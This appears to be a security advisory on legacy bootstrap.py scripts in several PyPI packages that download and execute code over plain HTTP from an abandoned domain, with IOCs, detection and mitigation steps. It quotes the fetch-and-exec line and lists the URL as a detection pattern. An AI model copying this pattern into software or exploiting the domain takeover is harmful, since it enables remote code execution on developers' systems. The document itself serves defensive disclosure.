Executive Summary

On November 28, 2025, ReversingLabs disclosed a latent but significant supply chain vulnerability in the Python Package Index (PyPI) ecosystem. The vulnerability stems from legacy bootstrap scripts (bootstrap.py) associated with the zc.buildout deployment tool. These scripts, still present in some active Python packages, contain a hardcoded instruction to download and execute code from python-distribute[.]org. This domain, associated with the long-defunct 'Distribute' project, has been abandoned and is available for purchase. A threat actor could register this domain to serve malware, which would then be executed by any system running the vulnerable script. This presents a classic domain-takeover attack scenario, posing a silent, long-term risk to legacy software projects.

---

Vulnerability Details

The vulnerability is not in the Python language or PyPI itself, but in the code of specific packages that bundle an old version of the bootstrap.py script from zc.buildout. This script was designed to set up a build environment and contains the following dangerous lines of code:

import urllib2

exec urllib2.urlopen('http://python-distribute.org/distribute_setup.py').read()

This code fetches a Python script over unencrypted HTTP from python-distribute[.]org and executes it directly. The 'Distribute' project was a fork of 'Setuptools' that was active around 2011-2013 before its changes were merged back. The domain was subsequently abandoned.

An attacker who registers python-distribute[.]org would have full control over the code executed by these bootstrap scripts. While the script is not triggered by a standard pip install, it can be run manually by developers or, more dangerously, by legacy automated build systems that still rely on zc.buildout.

Affected Systems

ReversingLabs identified several PyPI packages that include the vulnerable script, such as:

• tornado
• pypiserver
• slapos.core
• roman
• xlutils
• testfixtures

The full extent of the exposure is unknown, as many more private or older projects may contain the script.

---

Technical Analysis

This vulnerability enables a straightforward yet powerful attack.

• T1195.002 - Compromise Software Supply Chain: By taking over a domain referenced in a build tool, an attacker can poison the software supply chain for any project that uses it.
• T1189 - Drive-by Compromise: While not a traditional drive-by download from a website, the mechanism is similar: a user performs a seemingly legitimate action (running a bootstrap script) that results in the silent execution of malicious code from a controlled resource.
• T1105 - Ingress Tool Transfer: The vulnerable script acts as a downloader, pulling the attacker's payload into the target environment.
• T1059.006 - Python: The downloaded payload would be a Python script, executed by the Python interpreter.

The use of http:// instead of https:// makes this attack even easier, as the attacker would not need a valid SSL certificate and could also perform a man-in-the-middle attack to intercept the request even if they didn't own the domain.

---

Impact Assessment

The potential impact is high. If a threat actor were to purchase the domain, they could silently inject ransomware, spyware, or a persistent backdoor into countless development and production environments. The attack would be difficult to trace, as the initial infection vector is a trusted, albeit legacy, build script. Legacy systems in large enterprises, which are often slow to update, are at the highest risk. A successful compromise could lead to intellectual property theft, production outages, or further supply chain attacks originating from the compromised build environment.

---

IOCs

Type	Value	Description
domain	python-distribute.org	The abandoned domain that can be registered by an attacker.
file_name	bootstrap.py	The name of the vulnerable script from zc.buildout.
string_pattern	http://python-distribute.org/distribute_setup.py	The specific string to search for in codebases to identify vulnerable scripts.

---

Detection & Response

1. Code Scanning: Organizations should perform static analysis (SAST) of their entire codebase, including vendor and open-source dependencies, to search for the string python-distribute.org. This is a direct application of D3FEND's File Content Rules.
2. DNS/Network Monitoring: Monitor DNS queries and outbound network traffic for any requests to python-distribute.org. Any connection attempt to this domain should be treated as a high-priority security alert. This aligns with D3FEND's DNS Denylisting.
3. Dependency Analysis: Use Software Composition Analysis (SCA) tools to identify projects that depend on zc.buildout or packages known to bundle the vulnerable script.

Response: If a vulnerable script is found, it must be removed or updated immediately. If network traffic to the malicious domain is detected, the affected system must be isolated and forensically analyzed to determine if a compromise occurred.

---

Mitigation

1. Code Sanitization: The primary mitigation is to find and remove all instances of the vulnerable bootstrap.py script from all projects. Developers should replace the legacy build process with modern alternatives like pip and virtualenv.
2. Defensive Domain Registration: A security organization or the Python Software Foundation could proactively register python-distribute.org and either let it sinkhole or redirect it to a warning page to neutralize the threat for everyone.
3. Outbound Traffic Filtering: Block all network traffic to python-distribute.org at the firewall or proxy level. This is a simple but effective compensating control. See D3FEND's Outbound Traffic Filtering.
4. Update Build Processes: Migrate any remaining legacy projects that use zc.buildout to modern, secure build and dependency management systems.